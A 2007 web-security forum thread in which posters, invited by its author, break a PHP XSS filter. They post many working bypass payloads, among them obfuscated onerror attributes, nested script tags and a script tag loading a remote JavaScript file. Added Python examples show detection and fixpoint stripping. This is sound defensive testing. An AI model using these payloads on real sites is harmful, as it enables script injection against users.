Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 03:42PM

Okay, but whew, I think I really am done testing this... Lots of other projects on the radar. Nice try though, SirNotAppearingOnThisForum!

<IMG src='asdf?&#x27;&#09`style='asd&\#09onerror=alert("XSS")&#09;`;//>

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Date: January 23, 2007 04:39PM

wow, thanks loads for helping :-)

it turns out I had not only not gotten the regex quite right (it was the third try or something too...), but had not taken into account the possibility of it interpreting part of an attribute value as a style attribute.

just a few questions before I reupload it. I tested this in some browsers, but just to make sure, am I right in figuring that only ", ', ` (i.e. closed quotes) and whitespace can be in front of an attribute for it to be interpreted? and do you know what chars, exactly, are possible in an attribute name? (I'm guessing alphanumeric, hyphen, underscore and colon, but not too sure)



Edited 1 time(s). Last edit at 01/23/2007 04:55PM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 05:03PM

I decided not to do any guesswork and went straight to my fuzzer. Here are the decimal numbers of what can be put in immediately before an event handler in both IE and Firefox in the following syntax:

<IMG SRC="" [CHAR]onerror="alert('XSS')">

Internet Explorer:
0
9
10
11
12
13
32
47

Firefox
0
8
9
10
13
32

The only one that should be any surprise is 47, the forward slash. Other than that these are the usual suspects.

- RSnake
Gotta love it. http://ha.ckers.org
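
The separator list above, turned into a detection check: this is an added example, not code from the thread or from the filter being tested. It contrasts a naive "whitespace before the attribute" pattern with one that treats every fuzz-identified code point as a separator; the sample tags and both patterns are constructed for the example.

```python
import re

# Separator code points the fuzz run above found browsers accept immediately
# before an attribute name: the union of the IE list (0 9 10 11 12 13 32 47)
# and the Firefox list (0 8 9 10 13 32).
ATTR_SEPARATOR_CLASS = r"[\x00\x08\t\n\x0b\x0c\r /]"

# Naive check (constructed): assumes only ordinary whitespace can precede an
# attribute, which misses NUL, backspace and the forward slash.
NAIVE_HANDLER = re.compile(r"\s(on[a-z]+)\s*=", re.IGNORECASE)

# Hardened check: any separator from the fuzz list may precede the handler name.
HARDENED_HANDLER = re.compile(ATTR_SEPARATOR_CLASS + r"(on[a-z]+)\s*=", re.IGNORECASE)

def find_handlers(tag: str, pattern) -> list[str]:
    """Return the lower-cased event-handler attribute names `pattern` finds in `tag`."""
    return [name.lower() for name in pattern.findall(tag)]

# Constructed sample tags following the shapes posted in this thread.
SAMPLES = {
    "space":  '<IMG SRC="" onerror="alert(\'XSS\')">',
    "slash":  '<IMG SRC="" /onerror="alert(\'XSS\')">',   # char 47 as separator
    "nul":    '<img src="a.gif" \x00onload=alert(1) />',  # char 0 as separator
    "cr":     '<IMG src="x" style=a\ronerror=alert(1)>',  # char 13 as separator
    "benign": '<a href="mailto:x@example.invalid">x</a>',
}

def compare(samples: dict[str, str]) -> dict[str, tuple[list[str], list[str]]]:
    """Map each sample name to (naive findings, hardened findings)."""
    return {name: (find_handlers(tag, NAIVE_HANDLER), find_handlers(tag, HARDENED_HANDLER))
            for name, tag in samples.items()}

if __name__ == "__main__":
    for name, (naive, hardened) in compare(SAMPLES).items():
        print(f"{name:7} naive={naive} hardened={hardened}")
```

Enumerating separators only patches the pattern; the approach the filter's author moves to later in the thread, keeping just the attributes that were positively recognised and rebuilding the tag from them, does not depend on guessing every byte a rendering engine tolerates.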

Re: XSS Filter
Date: January 23, 2007 05:38PM

ok, sweet. I can't thank you enough, rsnake.

I'll reupload it tomorrow; I think I've fixed it for everything you posted so far.

Re: XSS Filter
Posted by: rsnake
Date: January 23, 2007 05:50PM

No worries, I aim to break. ;)

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: jungsonn
Date: January 23, 2007 08:15PM

Great stuff! I'm fuzzerless, so to say ^^ I'm interested in how far this will go.
One thing I know 4 sure, I'll wait until RSnake is done with it ;)

Re: XSS Filter
Date: January 24, 2007 10:51AM

ok, updated it.

I decided it was best and less complicated to simply check every attribute in one regular expression, so a) style= won't be found in another attribute and b) we can escape all the quotes in each attribute. Also updated regex in style parser, and fixed it to see ` as a quote.

Re: XSS Filter
Posted by: rsnake
Date: January 24, 2007 12:35PM

This one took a little work...

<IMG src="http://ha.ckers.org/" style"="style`=a&#13;/onerror=alert(String.fromCharCode(88,83,83))// >

It turns into:

<IMG src="http://ha.ckers.org/" style"="style="a
/onerror=alert(String.fromCharCode(88,83,83))//" &gt;`>

The style definitions are super important (the order of them and where the quotes go). You absolutely must do it in that order to get IE to ignore the second style definition. Painful but it works. And yes, I realize that it's still technically encapsulated in quotes, welcome to the wonderful world of rendering engines. Unfortunately logic goes right out the window. This is actually a perfect example of why when people tell me they know HTML I sorta laugh. They may be able to make a web page, but next to no one knows this level of HTML obfuscation.

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Date: January 24, 2007 02:50PM

Wow, that's some pretty whacked-out HTML...

Alright this time, I went ahead and not only checked every attribute, but I decided to only allow the checked attributes through as tag attributes (i.e. recreate the tag). Also removed some functions which got sort of redundant after the new attribute verification method.

It's sort of funny; I started this trying to be as minimal and passive as possible (remove the bad instead of allow the good, if you get what I mean), and it managed to morph into a rather aggressive filter.

Thanks so much for your help again rsnake, I would never have figured those work-arounds out myself.

EDIT: spelling



Edited 1 time(s). Last edit at 01/24/2007 03:14PM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 03:02PM

Does this work in your new version?

<img src="google.com/logo.gif" \0onload=document.getElementById('div').innerHTML='haxored!'; />

Re: XSS Filter
Date: January 24, 2007 03:12PM

well you can test it yourself, but no, it doesn't work. the \0 isn't evaluated, so it doesn't catch the second attribute, consequently excluding it from the 'rebuilt' tag.

Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 04:08PM

<a href="hello@hello.com" ONclick)=alert('sss'); >hello@hello.com</a>

Last one, this does work on my version.
damn, this really becomes a good sport ^^

And yet also a learning curve,
because I did not know that such thing was allowed in JavaScript:

onclick)=function();



Edited 2 time(s). Last edit at 01/24/2007 04:18PM by jungsonn.

Re: XSS Filter
Date: January 24, 2007 04:29PM

>Last one, this does work at my version.
version of what? it doesn't work with the latest update of the filter, if that's what you're referring to. if not, then, nevermind...

Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 04:37PM

Yes it was the previous one, I just tried your newest now;

And this one gets passed:

<marquee direction=right width=200 height=200; onmouseover=alert('aaa'); </ Yo mouseover me......


Rather funny I thought :)

Re: XSS Filter
Date: January 24, 2007 04:41PM

ah yeah, so it does. I knew removing that function would have consequences (it would have added an ending >). fixed, though.



Edited 1 time(s). Last edit at 01/24/2007 04:42PM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 04:42PM

Ok this one also:

<button onclick=alert('aaa'); </ Yo click me......

Seems that it doesn't need to be closed off for FF, ghehe..

Re: XSS Filter
Posted by: WhiteAcid
Date: January 24, 2007 04:46PM

I know this isn't a flaw in the filter but here you go: http://sirnot.110mb.com/htmlformatter.php/%22%3E%3Cscript%3Ealert(1)%3C/script%3E

Not many know how to abuse $_SERVER['PHP_SELF']. It doesn't always work though, and I haven't yet figured out what causes it to work on some servers and not on others.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Re: XSS Filter
Date: January 24, 2007 04:49PM

yeah, that would be because that script is a simple demo wrapper around the filter which I threw together so it could be easily tested. personally I don't really care if the script itself can be exploited; I have nothing on that server besides the filter and a few random html pages, anyhow.

EDIT: I'm afraid I have to leave for ~10 days tomorrow, so don't expect to hear from me for a little while. Thanks a ton for your help, everyone, I really appreciate it :-)



Edited 2 time(s). Last edit at 01/24/2007 05:01PM by SirNotAppearingOnThisForum.

Re: XSS Filter
Posted by: jungsonn
Date: January 24, 2007 05:11PM

Yes, isn't this solvable by using htmlspecialchars(), WhiteAcid? Mainly if it is in a form it will do that.

Re: XSS Filter
Posted by: rsnake
Date: January 24, 2007 07:19PM

Another issue:

<a href="hello@hello.com" a=`"a'style="a; style='<script'></a><script src=http://ha.ckers.org/xss.js?


Turns into:

<a href="http://hello@hello.com" a="&#96;&quot;a&#39;style=&quot;a;" style="&#39;</a" ><script src="http://ha.ckers.org/xss.js?" ></script></a>

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: eyeced
Date: January 25, 2007 07:15AM

I got one, no obfuscation at all. Still works at time of this post.

Trying the obvious <iframe src="http://ha.ckers.org/scriptlet.html"></iframe> gets stripped completely, but without ending the iframe the filter does it for you.

<iframe src="http://ha.ckers.org/scriptlet.html" <

gets returned as

<iframe src="http://ha.ckers.org/scriptlet.html" ></iframe>

which still works (in all browsers).

Re: XSS Filter
Posted by: pOkE
Date: January 25, 2007 07:55AM

Also,

<s<script>cript>alert('xss');</s</script>cript>

becomes

<script >alert('xss');</script>

unless I'm doing something wrong.

Re: XSS Filter
Posted by: jungsonn
Date: January 25, 2007 07:58AM

I have a feeling that with a bunch of fixes, some old vectors or combos of them return. I guess he has to test all vectors again when done fixing. A thing that's usually forgotten in beta-testing. like: ok fixed, but 5 fixes later, the first or second hole returns. Anyway, that's what beta-testing is I guess.

Re: XSS Filter
Posted by: rsnake
Date: January 25, 2007 10:33AM

Hahah, you guys are going after all the easy stuff... And yes, I tested both of your vectors and they work exactly as you said they would in the most current version. I just totally skipped over the easy stuff figuring that was already fixed and went right to the very difficult vectors. Nice work eyeced and pOkE! Hahah! Awesome.

- RSnake
Gotta love it. http://ha.ckers.org

Re: XSS Filter
Posted by: tx
Date: January 25, 2007 06:31PM

p0kE: you can actually shorten that vector to:
alert('xss');</scrip<script>t>
no sense in typing more than you have to ;)

-tx @ lowtech-labs.org

Re: XSS Filter
Posted by: rsnake
Date: January 25, 2007 09:04PM

As long as we are shortening his vector, why not reduce a few more chars:

alert('xss')</script<script>

;) Diminutive XSS is fun!

- RSnake
Gotta love it. http://ha.ckers.org
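
The reason pOkE's nested vector and the shortened variants above get through is that the filter removes each `<script>` token once, and the removal itself splices the surrounding characters into a fresh token. This added example (not the thread's filter, whose PHP is not posted here) reproduces that single-pass behaviour with a constructed pattern, then shows the fixpoint version and an idempotence check a reviewer can run against any sanitizer.

```python
import re

# Constructed pattern that mirrors what the thread's filter evidently did:
# remove a literal <script> or </script> tag, once per pass.
SCRIPT_TAG = re.compile(r"</?script\s*>", re.IGNORECASE)

def strip_once(html: str) -> str:
    """One removal pass: the non-idempotent behaviour pOkE's vector exposed."""
    return SCRIPT_TAG.sub("", html)

def strip_until_stable(html: str, max_rounds: int = 8) -> str:
    """Re-run the removal until the output stops changing (a fixpoint).

    Deleting one token can join the text on either side into a new token,
    so a blacklist filter that stops after one pass is never finished.
    """
    for _ in range(max_rounds):
        cleaned = SCRIPT_TAG.sub("", html)
        if cleaned == html:
            return cleaned
        html = cleaned
    # Still changing after max_rounds: fail closed instead of emitting partial output.
    raise ValueError("sanitizer did not converge")

def is_idempotent(sanitize, html: str) -> bool:
    """A sanitizer is only trustworthy if running it a second time changes nothing."""
    once = sanitize(html)
    return sanitize(once) == once

# Constructed samples: pOkE's vector from the thread, plus a doubly nested
# variant that needs three removal rounds before it is clean.
NESTED = "<s<script>cript>alert('xss');</s</script>cript>"
DOUBLE = "<s<s<script>cript>cript>alert('xss');</s</s</script>cript>cript>"

if __name__ == "__main__":
    print("once:   ", strip_once(NESTED))         # a complete <script> element
    print("stable: ", strip_until_stable(DOUBLE))  # bare text, no tags left
    print("idempotent?", is_idempotent(strip_once, NESTED))
```

Iterating to a fixpoint closes this particular hole, but it still leaves the filter guessing at what a parser will see; rebuilding tags from positively recognised parts, as the filter's author moved to earlier in the thread, is the approach that does not depend on the blacklist being complete.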

Re: XSS Filter
Date: February 04, 2007 10:17AM

Ok, sorry about that guys. Couldn't really do a whole lot for a tiny bit, but I'm back now :-)

Anyhow, that seemed to be yet another consequence of removing functions... :-/ In retrospect I don't know what I was doing with that general preg_replace call; that was really stupid of me. Moved the node name check to the callback function, so it should be fixed now.
